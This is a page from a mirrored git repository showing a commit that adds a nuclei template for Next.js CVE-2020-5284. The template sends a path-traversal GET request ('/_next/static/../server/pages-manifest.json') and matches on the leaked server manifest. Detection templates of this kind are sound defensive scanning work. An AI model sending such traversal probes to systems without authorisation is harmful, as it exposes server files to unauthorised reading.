daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Nextjs CVE-2020-5284

patch-1
rootxharsh 2020-04-05 18:24:33 +00:00
parent 98d707c149
commit 91ace5dba0
1 changed files with 18 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
cves/nextjs-cve-2020-5284.yaml Normal file
View File

@ -0,0 +1,18 @@
id: Next.js CVE-2020-5284
info:
name: Next.js .next/ limited path traversal
author: Harsh & Rahul
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/_next/static/../server/pages-manifest.json"
matchers:
- type: regex
regex:
- '\{"/_app":".*?_app\.js"'
- type: status
status:
- 200